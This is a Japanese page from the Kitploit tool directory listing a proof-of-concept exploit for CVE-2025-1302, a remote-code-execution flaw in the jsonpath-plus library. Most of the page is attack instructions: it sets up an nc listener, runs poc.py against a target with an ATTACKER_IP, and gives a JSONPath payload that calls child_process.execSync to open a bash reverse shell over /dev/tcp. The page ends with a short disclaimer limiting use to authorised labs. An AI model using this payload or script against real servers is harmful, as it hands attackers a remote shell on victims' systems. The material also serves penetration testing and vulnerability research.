Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-1302_jsonpath-plus_RCE — PoCエクスプロイトとjsonpath-plusのCVE-2025-1302の脆弱なサーバーデモ | Kitploit
ツール/GitHubGitHub/abrewer251/cve-2025-1302_jsonpath-plus_rce
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールレッドチーミングペイロード開発
GitHubabrewer251/cve-2025-1302_jsonpath-plus_rce

CVE-2025-1302_jsonpath-plus_RCE

PoCエクスプロイトとjsonpath-plusのCVE-2025-1302の脆弱なサーバーデモ

リポジトリを見る
111年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-1302 JSONPath-Plus RCE PoC

PoCスクリプト名: poc.py

CVE-2025-1302用の概念実証エクスプロイトスクリプトで、jsonpath-plusライブラリのRCE脆弱性を標的としています。脆弱なサービスエンドポイントに対して実行されると、スクリプトはJSONPathペイロードを介してリモートコード実行をトリガーし、攻撃者へのリバースシェルを確立しようとします。


機能

  • 柔軟なHTTPメソッド: --methodまたは--no-fallbackフラグを使用して、POST、GET、またはAUTO(POSTとGETのフォールバック)をサポート。
  • カスタムペイロード: {ip}および{port}テンプレートを使用して、ファイルから1つ以上のJSONPath RCEペイロードテンプレートを読み込み。
  • 組み込みのデフォルトペイロード: ペイロードファイルが指定されていない場合、完全なbashリバースシェルテンプレートを使用。
  • 冗長デバッグ: POSTおよびGET試行が失敗した場合、完全なリクエスト/レスポンスボディを表示。
  • 進捗表示: tqdmプログレスバーを使って遅延とペイロードループを表示。
  • ログ記録: --outputを使用してすべての結果をJSONファイルに保存可能。
  • インストール

    1. このリポジトリをクローン:

      root@kitploit:~
      git clone https://github.com/yourorg/jsonpath-rce-poc.git
      cd jsonpath-rce-poc
      
    2. 依存関係をインストール (Python 3.6+が必要):

      root@kitploit:~
      pip install -r requirements.txt
      

    使用方法

    1. 攻撃マシンでリスナーを起動 (必要に応じてポートを変更):

      root@kitploit:~
      nc -lvnp 9999
      
    2. PoCを実行:

      root@kitploit:~
      python3 poc.py \
        --url http://TARGET_HOST:PORT/query \
        --ip ATTACKER_IP --port 9999 \
        [--payload-file payloads.txt] \
        [--delay 5] \
        [--method AUTO|POST|GET] \
        [--no-fallback] \
        [--output results.json]
      
    • --payload-file: 各行に1つのJSONPathペイロードを含むファイル。{ip}および{port}プレースホルダを使用。
    • --delay: ペイロード送信前の待機秒数 (カウントダウン表示)。
    • --method: POST、GET、またはAUTO (デフォルト) を強制。
    • --no-fallback: GETリトライをスキップするショートハンド (--method POSTと同等)。
    • --output: 試行のJSONログを保存するパス。

    ペイロードファイルの例

    root@kitploit:~
    $[?(@.constructor.constructor("require(\"child_process\").execSync(\"bash -i >& /dev/tcp/{ip}/{port} 0>&1\")")())]
    

    コントリビューション

    1. リポジトリをフォークして機能ブランチを作成。
    2. 変更内容を含むプルリクエストを送信。

    免責事項

    このスクリプトは、管理されたラボ環境でのみ、所有しているシステムまたは明示的なテスト許可を得たシステムに対して使用してください。悪用は違法かつ非倫理的になる可能性があります。

    ツールをダウンロード